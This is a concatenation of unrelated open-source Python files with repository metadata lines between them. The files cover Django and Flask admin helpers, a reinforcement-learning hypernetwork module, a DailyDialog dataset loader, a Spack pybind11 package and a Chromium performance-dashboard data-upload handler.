_items_per_page = 25
items_count = lib_db.get.get__OperationsObjectEvent__count(
self.request.api_context
)
url_template = (
"%s/operations/object-log/{0}"
% self.request.registry.settings["app_settings"]["admin_prefix"]
)
(pager, offset) = self._paginate(
items_count,
url_template=url_template,
items_per_page=_items_per_page,
)
items_paged = lib_db.get.get__OperationsObjectEvent__paginated(
self.request.api_context, limit=_items_per_page, offset=offset
)
return {
"project": "peter_sslers",
"OperationsObjectEvent__count": items_count,
"OperationsObjectEvents": items_paged,
"pager": pager,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
}
@view_config(
route_name="admin:operations:object_log:focus",
renderer="/admin/operations-object_log-focus.mako",
)
def operations_object_log_focus(self):
item = lib_db.get.get__OperationsObjectEvent__by_id(
self.request.api_context, self.request.matchdict["id"], eagerload_log=True
)
if not item:
raise ValueError("no item")
return {
"project": "peter_sslers",
"OperationsObjectEvent": item,
"enable_redis": self.request.registry.settings["app_settings"][
"enable_redis"
],
"enable_nginx": self.request.registry.settings["app_settings"][
"enable_nginx"
],
}
# - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
| 36.484277 | 93 | 0.508102 | [
"MIT"
] | jvanasco/peter_sslers | src/peter_sslers/web/views_admin/operation.py | 11,602 | Python |
#######################################################################
# Copyright (C) 2017 Shangtong Zhang([email protected]) #
# Permission given to modify the code as long as you keep this #
# declaration at the top #
#######################################################################
from .network_utils import *
from .network_bodies import *
from .hyper_bodies import *
from .hypernetwork_ops import *
from ..utils.hypernet_heads_defs import *
from ..component.samplers import *
class VanillaHyperNet(nn.Module, BaseNet):
def __init__(self, output_dim, body):
super(VanillaHyperNet, self).__init__()
self.mixer = False
self.config = VanillaNet_config(body.feature_dim, output_dim)
self.fc_head = LinearGenerator(self.config['fc_head'])
self.body = body
self.to(Config.DEVICE)
def sample_model_seed(self):
if not self.mixer:
self.model_seed = {
'fc_head_z': torch.rand(self.fc_head.config['n_gen'], particles, self.z_dim).to(Config.DEVICE)
}
else:
self.model_seed = torch.rand(particles, self.s_dim)
def forward(self, x, z=None):
phi = self.body(tensor(x, z))
y = self.fc_head(z[0], phi)
return y
class DuelingHyperNet(nn.Module, BaseNet):
def __init__(self, action_dim, body, hidden, dist, particles):
super(DuelingHyperNet, self).__init__()
self.mixer = False
self.config = DuelingNet_config(body.feature_dim, action_dim)
self.config['fc_value'] = self.config['fc_value']._replace(d_hidden=hidden)
self.config['fc_advantage'] = self.config['fc_advantage']._replace(d_hidden=hidden)
self.fc_value = LinearGenerator(self.config['fc_value']).cuda()
self.fc_advantage = LinearGenerator(self.config['fc_advantage']).cuda()
self.features = body
self.s_dim = self.config['s_dim']
self.z_dim = self.config['z_dim']
self.n_gen = self.config['n_gen']
self.particles = particles
self.noise_sampler = NoiseSampler(dist, self.z_dim, self.particles)
# self.sample_model_seed()
self.to(Config.DEVICE)
def sample_model_seed(self):
sample_z = self.noise_sampler.sample().to(Config.DEVICE)
# sample_z = sample_z.unsqueeze(0).repeat(self.features.config['n_gen'], 1, 1)
sample_z = sample_z.unsqueeze(0).repeat(self.particles, 1)
self.model_seed = {
'value_z': sample_z,
'advantage_z': sample_z,
}
def set_model_seed(self, seed):
self.model_seed = seed
def forward(self, x, to_numpy=False, theta=None):
if not isinstance(x, torch.cuda.FloatTensor):
x = tensor(x)
if x.shape[0] == 1 and x.shape[1] == 1: ## dm_env returns one too many dimensions
x = x[0]
phi = self.body(x)
return self.head(phi)
def body(self, x=None):
if not isinstance(x, torch.cuda.FloatTensor):
x = tensor(x)
return self.features(x)
def head(self, phi):
phi = phi.repeat(self.particles, 1, 1) # since we have a deterministic body with many heads
value = self.fc_value(self.model_seed['value_z'], phi)
advantage = self.fc_advantage(self.model_seed['advantage_z'], phi)
q = value.expand_as(advantage) + (advantage - advantage.mean(-1, keepdim=True).expand_as(advantage))
return q
def sample_model(self, component):
param_sets = []
if component == 'q':
param_sets.extend(self.fc_value(z=self.model_seed['value_z']))
param_sets.extend(self.fc_advantage(z=self.model_seed['advantage_z']))
return param_sets
def predict_action(self, x, pred, to_numpy=False):
x = tensor(x)
q = self(x)
if pred == 'max':
max_q, max_q_idx = q.max(-1) # max over q values
max_actor = max_q.max(0)[1] # max over particles
action = q[max_actor].argmax()
elif pred == 'rand':
idx = np.random.choice(self.particles, 1)[0]
action = q[idx].max(0)[1]
elif pred == 'mean':
action_means = q.mean(0) #[actions]
action = action_means.argmax()
if to_numpy:
action = action.cpu().detach().numpy()
return action
| 38.230769 | 114 | 0.586184 | [
"MIT"
] | neale/HyperDeepRL | deep_rl/network/hyper_heads.py | 4,473 | Python |
from django.utils import timezone
from .forms import SchedDayForm
class AdminCommonMixin(object):
"""
common methods for all admin class
set default values for owner, date, etc
"""
def save_model(self, request, obj, form, change):
try:
obj.created_by = request.user
except:
pass
super().save_model(request, obj, form, change)
def get_queryset(self, request):
"""
read queryset if is superuser
or read owns objects
"""
qs = super().get_queryset(request)
if request.user.is_superuser:
return qs
return qs.filter(created_by=request.user)
def response_change(self, request, obj):
"""
get from response change some custom action from post
ej: '_custom_action' in request.POST:
"""
if '_custom_action' in request.POST:
pass
return super().response_change(request, obj)
def response_add(self, request, obj):
"""
get from response change some custom action from post
ej: '_custom_action' in request.POST:
"""
if '_custom_action' in request.POST:
pass
return super().response_add(request, obj)
class CalendarActionMixin(object):
def save_model(self, request, obj, form, change):
try:
obj.created_by = request.user
except:
pass
super().save_model(request, obj, form, change)
def get_queryset(self, request):
"""
read queryset if is superuser
or read owns objects
"""
qs = super().get_queryset(request)
if request.user.is_superuser:
return qs
return qs.filter(created_by=request.user)
def changelist_view(self, request, extra_context=None):
response = super().changelist_view(
request,
extra_context=extra_context
)
try:
# get only when times of days are set
qs = response.context_data['cl'].queryset.timesofdays()
except (AttributeError, KeyError):
return response
response.context_data['scheduled_days'] = qs
return response
| 28.367089 | 67 | 0.594378 | [
"MIT"
] | dvek/scyp | schedules/mixins.py | 2,241 | Python |
# coding=utf-8
# Copyright 2020 The HuggingFace NLP Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""DailyDialog: A Manually Labelled Multi-turn Dialogue Dataset"""
from __future__ import absolute_import, division, print_function
import os
from zipfile import ZipFile
import nlp
_CITATION = """\
@InProceedings{li2017dailydialog,
author = {Li, Yanran and Su, Hui and Shen, Xiaoyu and Li, Wenjie and Cao, Ziqiang and Niu, Shuzi},
title = {DailyDialog: A Manually Labelled Multi-turn Dialogue Dataset},
booktitle = {Proceedings of The 8th International Joint Conference on Natural Language Processing (IJCNLP 2017)},
year = {2017}
}
"""
_DESCRIPTION = """\
We develop a high-quality multi-turn dialog dataset, DailyDialog, which is intriguing in several aspects.
The language is human-written and less noisy. The dialogues in the dataset reflect our daily communication way
and cover various topics about our daily life. We also manually label the developed dataset with communication
intention and emotion information. Then, we evaluate existing approaches on DailyDialog dataset and hope it
benefit the research field of dialog systems.
"""
_URL = "http://yanran.li/files/ijcnlp_dailydialog.zip"
act_label = {
"0": "__dummy__", # Added to be compatible out-of-the-box with nlp.ClassLabel
"1": "inform",
"2": "question",
"3": "directive",
"4": "commissive",
}
emotion_label = {
"0": "no emotion",
"1": "anger",
"2": "disgust",
"3": "fear",
"4": "happiness",
"5": "sadness",
"6": "surprise",
}
class DailyDialog(nlp.GeneratorBasedBuilder):
"""DailyDialog: A Manually Labelled Multi-turn Dialogue Dataset"""
VERSION = nlp.Version("1.0.0")
__EOU__ = "__eou__"
def _info(self):
return nlp.DatasetInfo(
description=_DESCRIPTION,
features=nlp.Features(
{
"dialog": nlp.features.Sequence(
nlp.Value("string")
),
"act": nlp.features.Sequence(
nlp.ClassLabel(names=list(act_label.values()))
),
"emotion": nlp.features.Sequence(
nlp.ClassLabel(names=list(emotion_label.values()))
),
}
),
supervised_keys=None,
homepage="http://yanran.li/dailydialog",
citation=_CITATION,
)
def _split_generators(self, dl_manager: nlp.DownloadManager):
"""Returns SplitGenerators."""
# dl_manager is a nlp.download.DownloadManager that can be used to
# download and extract URLs
dl_dir = dl_manager.download_and_extract(_URL)
data_dir = os.path.join(dl_dir, "ijcnlp_dailydialog")
# The splits are nested inside the zip
for name in ("train", "validation", "test"):
zip_fpath = os.path.join(data_dir, f"{name}.zip")
with ZipFile(zip_fpath) as zip_file:
zip_file.extractall(path=data_dir)
zip_file.close()
return [
nlp.SplitGenerator(
name=nlp.Split.TRAIN,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"file_path": os.path.join(data_dir, "train", "dialogues_train.txt"),
"act_path": os.path.join(data_dir, "train", "dialogues_act_train.txt"),
"emotion_path": os.path.join(data_dir, "train", "dialogues_emotion_train.txt"),
"split": "train",
},
),
nlp.SplitGenerator(
name=nlp.Split.TEST,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"file_path": os.path.join(data_dir, "test", "dialogues_test.txt"),
"act_path": os.path.join(data_dir, "test", "dialogues_act_test.txt"),
"emotion_path": os.path.join(data_dir, "test", "dialogues_emotion_test.txt"),
"split": "test",
},
),
nlp.SplitGenerator(
name=nlp.Split.VALIDATION,
# These kwargs will be passed to _generate_examples
gen_kwargs={
"file_path": os.path.join(data_dir, "validation", "dialogues_validation.txt"),
"act_path": os.path.join(data_dir, "validation", "dialogues_act_validation.txt"),
"emotion_path": os.path.join(data_dir, "validation", "dialogues_emotion_validation.txt"),
"split": "dev",
},
),
]
def _generate_examples(self, file_path, act_path, emotion_path, split):
""" Yields examples. """
# Yields (key, example) tuples from the dataset
with open(file_path, "r", encoding="utf-8") as f, open(act_path, "r", encoding="utf-8") as act, open(
emotion_path, "r", encoding="utf-8"
) as emotion:
for i, (line_f, line_act, line_emotion) in enumerate(zip(f, act, emotion)):
if len(line_f.strip()) == 0:
break
dialog = line_f.split(self.__EOU__)[:-1]
act = line_act.split(" ")[:-1]
emotion = line_emotion.split(" ")[:-1]
assert len(dialog) == len(act) == len(emotion), "Different turns btw dialogue & emotion & action"
yield f"{split}-{i}", {
"dialog": dialog,
"act": [act_label[x] for x in act],
"emotion": [emotion_label[x] for x in emotion],
}
| 39.392405 | 117 | 0.587725 | [
"Apache-2.0"
] | vinayya/nlp | datasets/daily_dialog/daily_dialog.py | 6,224 | Python |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Copyright © 2007 Free Software Foundation, Inc. <https://fsf.org/>
#
# Licensed under the GNU General Public License, version 3 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://jxself.org/translations/gpl-3.zh.shtml
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import time
import json
from functools import wraps
from flask_restful import ResponseBase
from sfo_server.models import SfoServerUser, SfoAccountManagerMethod, SfoServerAccessLog
from sfo_server.resource.common import timestamp_format
from flask import request, g, session
def access_log_decorate(func):
"""
用于记录用户登录后访问网址行为的装饰器
:param func:
:return:
"""
@wraps(func)
def wrapper(*args, **kwargs):
access_user = request.headers.get('X-Real-IP ', request.remote_addr)
access_method = request.method
access_path = request.path
access_time = timestamp_format(time.time())
resp = func(*args, **kwargs)
access_result = resp[0].get('status')
access_message = resp[0].get('message', 'Internal Server Error') if resp else 'Internal Server Error'
SfoServerAccessLog.add_access_log(access_user, access_method, access_path, access_time, access_result, access_message)
return resp
return wrapper
def login_required(func):
"""
验证是否登录
:param func:
:return:
"""
@wraps(func)
def wrapper(*args, **kwargs):
user_account = session.get('username', '')
if user_account:
login_user = SfoServerUser.query_user_by_account(user_account)
g.user = login_user
return func(*args, **kwargs)
else:
return ResponseBase(json.dumps({'status': 401, "message": u'请先登录'}),
status=401, content_type='application/json')
return wrapper
def permission_required(*resources):
"""
权限验证的前提是用户已经登录
权限验证
:param resources: 控制的资源对象
"""
def decorate(func):
@wraps(func)
def wrapper(*args, **kwargs):
method = func.__name__
resource_names = [resource.__tablename__ for resource in resources]
need_permission = set([method + '_' + resource_name for resource_name in resource_names])
user = getattr(g, 'user', '')
has_permission_set = set()
is_clusteradmin = user.is_clusteradmin if user else 0
if is_clusteradmin:
return func(*args, **kwargs)
if user:
for role in user.roles:
for permission in role.permissions:
has_permission_set.add(permission.permission_name)
if not need_permission.issubset(has_permission_set):
return ResponseBase(json.dumps({'status': 403, 'message': u'权限不足,请联系管理员'}),
status=403, content_type='application/json')
else:
return func(*args, **kwargs)
else:
return ResponseBase(json.dumps({'status': 401, "message": u'请先登录'}),
status=401, content_type='application/json')
return wrapper
return decorate
| 36.222222 | 126 | 0.634969 | [
"Apache-2.0"
] | SF-Technology/SFO | sfo_server/decorate.py | 3,725 | Python |
import itertools
m,n = input().split()
n = int(n)
l = [ ''.join(list(i)) for i in list(itertools.permutations(list(m), n))]
l.sort()
for i in l:
print(i) | 22.428571 | 73 | 0.617834 | [
"MIT"
] | abhinavgunwant/hackerrank-solutions | Domains/Python/06 - Itertools/itertools.permutations()/solution.py | 157 | Python |
# Copyright 2013-2021 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
import os
class PyPybind11(CMakePackage):
"""pybind11 -- Seamless operability between C++11 and Python.
pybind11 is a lightweight header-only library that exposes C++ types in
Python and vice versa, mainly to create Python bindings of existing C++
code. Its goals and syntax are similar to the excellent Boost.Python
library by David Abrahams: to minimize boilerplate code in traditional
extension modules by inferring type information using compile-time
introspection."""
homepage = "https://pybind11.readthedocs.io"
url = "https://github.com/pybind/pybind11/archive/v2.6.2.tar.gz"
git = "https://github.com/pybind/pybind11.git"
maintainers = ['ax3l']
version('master', branch='master')
version('2.6.2', sha256='8ff2fff22df038f5cd02cea8af56622bc67f5b64534f1b83b9f133b8366acff2')
version('2.6.1', sha256='cdbe326d357f18b83d10322ba202d69f11b2f49e2d87ade0dc2be0c5c34f8e2a')
version('2.5.0', sha256='97504db65640570f32d3fdf701c25a340c8643037c3b69aec469c10c93dc8504', preferred=True)
version('2.4.3', sha256='1eed57bc6863190e35637290f97a20c81cfe4d9090ac0a24f3bbf08f265eb71d')
version('2.3.0', sha256='0f34838f2c8024a6765168227ba587b3687729ebf03dc912f88ff75c7aa9cfe8')
version('2.2.4', sha256='b69e83658513215b8d1443544d0549b7d231b9f201f6fc787a2b2218b408181e')
version('2.2.3', sha256='3a3b7b651afab1c5ba557f4c37d785a522b8030dfc765da26adc2ecd1de940ea')
version('2.2.2', sha256='b639a2b2cbf1c467849660801c4665ffc1a4d0a9e153ae1996ed6f21c492064e')
version('2.2.1', sha256='f8bd1509578b2a1e7407d52e6ee8afe64268909a1bbda620ca407318598927e7')
version('2.2.0', sha256='1b0fda17c650c493f5862902e90f426df6751da8c0b58c05983ab009951ed769')
version('2.1.1', sha256='f2c6874f1ea5b4ad4ffffe352413f7d2cd1a49f9050940805c2a082348621540')
version('2.1.0', sha256='2860f2b8d0c9f65f0698289a161385f59d099b7ead1bf64e8993c486f2b93ee0')
depends_on('py-setuptools', type='build')
extends('python')
# compiler support
conflicts('%gcc@:4.7')
conflicts('%clang@:3.2')
conflicts('%intel@:16')
def cmake_args(self):
args = []
args.append('-DPYTHON_EXECUTABLE:FILEPATH=%s'
% self.spec['python'].command.path)
args += [
self.define('PYBIND11_TEST', self.run_tests)
]
return args
def setup_build_environment(self, env):
env.set('PYBIND11_USE_CMAKE', 1)
# https://github.com/pybind/pybind11/pull/1995
@when('@:2.4.99')
def patch(self):
""" see https://github.com/spack/spack/issues/13559 """
filter_file('import sys',
'import sys; return "{0}"'.format(self.prefix.include),
'pybind11/__init__.py',
string=True)
def install(self, spec, prefix):
super(PyPybind11, self).install(spec, prefix)
setup_py('install', '--single-version-externally-managed', '--root=/',
'--prefix={0}'.format(prefix))
@run_after('install')
@on_package_attributes(run_tests=True)
def install_test(self):
with working_dir('spack-test', create=True):
# test include helper points to right location
python = self.spec['python'].command
py_inc = python(
'-c',
'import pybind11 as py; ' +
self.spec['python'].package.print_string('py.get_include()'),
output=str).strip()
for inc in [py_inc, self.prefix.include]:
inc_file = join_path(inc, 'pybind11', 'pybind11.h')
assert os.path.isfile(inc_file)
| 43.426966 | 111 | 0.682536 | [
"ECL-2.0",
"Apache-2.0",
"MIT-0",
"MIT"
] | ikitayama/spack | var/spack/repos/builtin/packages/py-pybind11/package.py | 3,865 | Python |
# Copyright 2015 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""URL endpoint to allow Buildbot slaves to post data to the dashboard."""
import copy
import json
import logging
import math
import re
from google.appengine.api import datastore_errors
from google.appengine.api import taskqueue
from google.appengine.ext import ndb
from dashboard import math_utils
from dashboard import post_data_handler
from dashboard.common import datastore_hooks
from dashboard.models import graph_data
_TASK_QUEUE_NAME = 'new-points-queue'
# Number of rows to process per task queue task. This limits the task size
# and execution time (Limits: 100KB object size and 10 minutes execution time).
_TASK_QUEUE_SIZE = 32
# Max length for a Row property name.
_MAX_COLUMN_NAME_LENGTH = 25
# Maximum length of a value for a string property.
_STRING_COLUMN_MAX_LENGTH = 400
# Maximum number of properties for a Row.
_MAX_NUM_COLUMNS = 30
# Maximum length for a test path. This limit is required because the test path
# used as the string ID for TestContainer (the parent in the datastore for Row
# entities), and datastore imposes a maximum string ID length.
_MAX_TEST_PATH_LENGTH = 500
class BadRequestError(Exception):
"""An error indicating that a 400 response status should be returned."""
pass
class AddPointHandler(post_data_handler.PostDataHandler):
"""URL endpoint to post data to the dashboard."""
def post(self):
"""Validates data parameter and add task to queue to process points.
The row data comes from a "data" parameter, which is a JSON encoding of a
list of dictionaries, each of which represents one performance result
(one point in a graph) and associated data.
[
{
"master": "ChromiumPerf",
"bot": "xp-release-dual-core",
"test": "dromaeo/dom/modify",
"revision": 123456789,
"value": 24.66,
"error": 2.33,
"units": "ms",
"supplemental_columns": {
"d_median": 24234.12,
"d_mean": 23.553,
"r_webkit": 423340,
...
},
...
},
...
]
In general, the required fields are "master", "bot", "test" (which together
form the test path which identifies the series that this point belongs to),
and "revision" and "value", which are the X and Y values for the point.
This API also supports the Dashboard JSON v1.0 format (go/telemetry-json),
the first producer of which is Telemetry. Telemetry provides lightweight
serialization of values it produces, as JSON. If a dashboard JSON object is
passed, it will be a single dict rather than a list, with the test,
value, error, and units fields replaced by a chart_data field containing a
Chart JSON dict (see design doc, and example below). Dashboard JSON v1.0 is
processed by converting it into rows (which can be viewed as Dashboard JSON
v0).
{
"master": "ChromiumPerf",
<other row fields>,
"chart_data": {
"foo": {
"bar": {
"type": "scalar",
"name": "foo.bar",
"units": "ms",
"value": 4.2,
},
"summary": {
"type": "list_of_scalar_values",
"name": "foo",
"units": "ms",
"values": [4.2, 5.7, 6.8],
"std": 1.30512,
},
},
}
Request parameters:
data: JSON encoding of a list of dictionaries.
Outputs:
Empty 200 response with if successful,
200 response with warning message if optional data is invalid,
403 response with error message if sender IP is not white-listed,
400 response with error message if required data is invalid.
500 with error message otherwise.
"""
datastore_hooks.SetPrivilegedRequest()
if not self._CheckIpAgainstWhitelist():
# TODO(qyearsley): Add test coverage. See catapult:#1346.
return
data = self.request.get('data')
if not data:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
self.ReportError('Missing "data" parameter.', status=400)
return
try:
data = json.loads(self.request.get('data'))
except ValueError:
self.ReportError('Invalid JSON string.', status=400)
return
logging.info('Received data: %s', data)
try:
if type(data) is dict:
if data.get('chart_data'):
data = _DashboardJsonToRawRows(data)
if not data:
return # No data to add, bail out.
else:
self.ReportError(
'Data should be a list of rows or a Dashboard JSON v1.0 dict.',
status=400)
return
test_map = _ConstructTestPathMap(data)
for row_dict in data:
_ValidateRowDict(row_dict, test_map)
_AddTasks(data)
except BadRequestError as error:
# If any of the data was invalid, abort immediately and return an error.
self.ReportError(error.message, status=400)
def _DashboardJsonToRawRows(dash_json_dict):
"""Formats a Dashboard JSON dict as a list of row dicts.
For the dashboard to begin accepting the Telemetry Dashboard JSON format
as per go/telemetry-json, this function chunks a Dashboard JSON literal
into rows and passes the resulting list to _AddTasks.
Args:
dash_json_dict: A dashboard JSON v1.0 dict.
Returns:
A list of dicts, each of which represents a point.
Raises:
AssertionError: The given argument wasn't a dict.
BadRequestError: The content of the input wasn't valid.
"""
assert type(dash_json_dict) is dict
# A Dashboard JSON dict should at least have all charts coming from the
# same master, bot and rev. It can contain multiple charts, however.
if not dash_json_dict.get('master'):
raise BadRequestError('No master name given.')
if not dash_json_dict.get('bot'):
raise BadRequestError('No bot name given.')
if not dash_json_dict.get('point_id'):
raise BadRequestError('No point_id number given.')
if not dash_json_dict.get('chart_data'):
raise BadRequestError('No chart data given.')
test_suite_name = _TestSuiteName(dash_json_dict)
chart_data = dash_json_dict.get('chart_data', {})
charts = chart_data.get('charts', {})
if not charts:
return [] # No charts implies no data to add.
# Links to about:tracing traces are listed under 'trace'; if they
# exist copy them to a separate dictionary and delete from the chartjson
# so that we don't try to process them as data points.
tracing_links = None
if 'trace' in charts:
tracing_links = charts['trace'].copy()
del charts['trace']
row_template = _MakeRowTemplate(dash_json_dict)
benchmark_description = chart_data.get('benchmark_description', '')
trace_rerun_options = dict(chart_data.get('trace_rerun_options', []))
is_ref = bool(dash_json_dict.get('is_ref'))
rows = []
for chart in charts:
for trace in charts[chart]:
# Need to do a deep copy here so we don't copy a_tracing_uri data.
row = copy.deepcopy(row_template)
specific_vals = _FlattenTrace(
test_suite_name, chart, trace, charts[chart][trace], is_ref,
tracing_links, benchmark_description)
# Telemetry may validly produce rows that represent a value of NaN. To
# avoid getting into messy situations with alerts, we do not add such
# rows to be processed.
if not (math.isnan(specific_vals['value']) or
math.isnan(specific_vals['error'])):
if specific_vals['tracing_uri']:
row['supplemental_columns']['a_tracing_uri'] = specific_vals[
'tracing_uri']
if trace_rerun_options:
row['supplemental_columns']['a_trace_rerun_options'] = (
trace_rerun_options)
row.update(specific_vals)
rows.append(row)
return rows
def _TestSuiteName(dash_json_dict):
"""Extracts a test suite name from Dashboard JSON.
The dashboard JSON may contain a field "test_suite_name". If this is not
present or it is None, the dashboard will fall back to using "benchmark_name"
in the "chart_data" dict.
"""
if dash_json_dict.get('test_suite_name'):
return dash_json_dict['test_suite_name']
try:
return dash_json_dict['chart_data']['benchmark_name']
except KeyError as e:
raise BadRequestError('Could not find test suite name. ' + e.message)
def _AddTasks(data):
"""Puts tasks on queue for adding data.
Args:
data: A list of dictionaries, each of which represents one point.
"""
task_list = []
for data_sublist in _Chunk(data, _TASK_QUEUE_SIZE):
task_list.append(taskqueue.Task(
url='/add_point_queue',
params={'data': json.dumps(data_sublist)}))
queue = taskqueue.Queue(_TASK_QUEUE_NAME)
for task_sublist in _Chunk(task_list, taskqueue.MAX_TASKS_PER_ADD):
# Calling get_result waits for all tasks to be added. It's possible that
# this is different, and maybe faster, than just calling queue.add.
queue.add_async(task_sublist).get_result()
def _Chunk(items, chunk_size):
"""Breaks a long list into sub-lists of a particular size."""
chunks = []
for i in range(0, len(items), chunk_size):
chunks.append(items[i:i + chunk_size])
return chunks
def _MakeRowTemplate(dash_json_dict):
"""Produces a template for rows created from a Dashboard JSON v1.0 dict.
_DashboardJsonToRawRows adds metadata fields to every row that it creates.
These include things like master, bot, point ID, versions, and other
supplementary data. This method produces a dict containing this metadata
to which row-specific information (like value and error) can be added.
Some metadata needs to be transformed to conform to the v0 format, and this
method is also responsible for that transformation.
Some validation is deferred until after the input is converted to a list
of row dicts, since revision format correctness is checked on a per-point
basis.
Args:
dash_json_dict: A dashboard JSON v1.0 dict.
Returns:
A dict containing data to include in each row dict that is created from
|dash_json_dict|.
"""
row_template = dash_json_dict.copy()
del row_template['chart_data']
del row_template['point_id']
row_template['revision'] = dash_json_dict['point_id']
annotations = row_template['supplemental']
versions = row_template['versions']
del row_template['supplemental']
del row_template['versions']
row_template['supplemental_columns'] = {}
supplemental = row_template['supplemental_columns']
for annotation in annotations:
supplemental['a_' + annotation] = annotations[annotation]
for version in versions:
supplemental['r_' + version] = versions[version]
return row_template
def _FlattenTrace(test_suite_name, chart_name, trace_name, trace,
is_ref=False, tracing_links=None, benchmark_description=''):
"""Takes a trace dict from dashboard JSON and readies it for display.
Traces can be either scalars or lists; if scalar we take the value directly;
if list we average the values and compute their standard deviation. We also
extract fields that are normally part of v0 row dicts that are uploaded
using add_point but are actually part of traces in the v1.0 format.
Args:
test_suite_name: The name of the test suite (benchmark).
chart_name: The name of the chart to which this trace belongs.
trace_name: The name of the passed trace.
trace: A trace dict extracted from a dashboard JSON chart.
is_ref: A boolean which indicates whether this trace comes from a
reference build.
tracing_links: A dictionary mapping trace names to about:tracing trace
urls in cloud storage
benchmark_description: A string documenting the benchmark suite to which
this trace belongs.
Returns:
A dict containing units, value, and error for this trace.
Raises:
BadRequestError: The data wasn't valid.
"""
if '@@' in chart_name:
tir_label, chart_name = chart_name.split('@@')
chart_name = chart_name + '/' + tir_label
value, error = _ExtractValueAndError(trace)
# If there is a link to an about:tracing trace in cloud storage for this
# test trace_name, cache it.
tracing_uri = None
if (tracing_links and
trace_name in tracing_links and
'cloud_url' in tracing_links[trace_name]):
tracing_uri = tracing_links[trace_name]['cloud_url'].replace('\\/', '/')
trace_name = _EscapeName(trace_name)
if trace_name == 'summary':
subtest_name = chart_name
else:
subtest_name = chart_name + '/' + trace_name
name = test_suite_name + '/' + subtest_name
if trace_name == 'summary' and is_ref:
name += '/ref'
elif trace_name != 'summary' and is_ref:
name += '_ref'
row_dict = {
'test': name,
'value': value,
'error': error,
'units': trace['units'],
'tracing_uri': tracing_uri,
'benchmark_description': benchmark_description,
}
if 'improvement_direction' in trace:
improvement_direction_str = trace['improvement_direction']
if improvement_direction_str is None:
raise BadRequestError('improvement_direction must not be None')
row_dict['higher_is_better'] = _ImprovementDirectionToHigherIsBetter(
improvement_direction_str)
return row_dict
def _ExtractValueAndError(trace):
"""Returns the value and measure of error from a chartjson trace dict.
Args:
trace: A dict that has one "result" from a performance test, e.g. one
"value" in a Telemetry test, with the keys "trace_type", "value", etc.
Returns:
A pair (value, error) where |value| is a float and |error| is some measure
of variance used to show error bars; |error| could be None.
Raises:
BadRequestError: Data format was invalid.
"""
trace_type = trace.get('type')
if trace_type == 'scalar':
value = trace.get('value')
if value is None and trace.get('none_value_reason'):
return float('nan'), 0
try:
return float(value), 0
except:
raise BadRequestError('Expected scalar value, got: %r' % value)
if trace_type == 'list_of_scalar_values':
values = trace.get('values')
if not isinstance(values, list) and values is not None:
# Something else (such as a single scalar, or string) was given.
raise BadRequestError('Expected list of scalar values, got: %r' % values)
if not values or None in values:
# None was included or values is None; this is not an error if there
# is a reason.
if trace.get('none_value_reason'):
return float('nan'), float('nan')
raise BadRequestError('Expected list of scalar values, got: %r' % values)
if not all(_IsNumber(v) for v in values):
raise BadRequestError('Non-number found in values list: %r' % values)
value = math_utils.Mean(values)
std = trace.get('std')
if std is not None:
error = std
else:
error = math_utils.StandardDeviation(values)
return value, error
if trace_type == 'histogram':
return _GeomMeanAndStdDevFromHistogram(trace)
raise BadRequestError('Invalid value type in chart object: %r' % trace_type)
def _IsNumber(v):
return isinstance(v, float) or isinstance(v, int) or isinstance(v, long)
def _EscapeName(name):
"""Escapes a trace name so it can be stored in a row.
Args:
name: A string representing a name.
Returns:
An escaped version of the name.
"""
return re.sub(r'[\:|=/#&,]', '_', name)
def _GeomMeanAndStdDevFromHistogram(histogram):
"""Generates the geom. mean and std. dev. for a histogram.
A histogram is a collection of numerical buckets with associated
counts; a bucket can either represent a number of instances of a single
value ('low'), or from within a range of values (in which case 'high' will
specify the upper bound). We compute the statistics by treating the
histogram analogously to a list of individual values, where the counts tell
us how many of each value there are.
Args:
histogram: A histogram dict with a list 'buckets' of buckets.
Returns:
The geometric mean and standard deviation of the given histogram.
"""
# Note: This code comes originally from
# build/scripts/common/chromium_utils.py and was used initially for
# processing histogram results on the buildbot side previously.
if 'buckets' not in histogram:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
return 0.0, 0.0
count = 0
sum_of_logs = 0
for bucket in histogram['buckets']:
if 'high' in bucket:
bucket['mean'] = (bucket['low'] + bucket['high']) / 2.0
else:
# TODO(qyearsley): Add test coverage. See catapult:#1346.
bucket['mean'] = bucket['low']
if bucket['mean'] > 0:
sum_of_logs += math.log(bucket['mean']) * bucket['count']
count += bucket['count']
if count == 0:
return 0.0, 0.0
sum_of_squares = 0
geom_mean = math.exp(sum_of_logs / count)
for bucket in histogram['buckets']:
if bucket['mean'] > 0:
sum_of_squares += (bucket['mean'] - geom_mean) ** 2 * bucket['count']
return geom_mean, math.sqrt(sum_of_squares / count)
def _ImprovementDirectionToHigherIsBetter(improvement_direction_str):
"""Converts an improvement direction string to a higher_is_better boolean.
Args:
improvement_direction_str: a string, either 'up' or 'down'.
Returns:
A boolean expressing the appropriate higher_is_better value.
Raises:
BadRequestError: if improvement_direction_str is invalid.
"""
# If improvement_direction is provided, we want to use it. Otherwise, by not
# providing it we'll fall back to unit-info.json
# TODO(eakuefner): Fail instead of falling back after fixing crbug.com/459450.
if improvement_direction_str == 'up':
return True
elif improvement_direction_str == 'down':
return False
else:
raise BadRequestError('Invalid improvement direction string: ' +
improvement_direction_str)
def _ConstructTestPathMap(row_dicts):
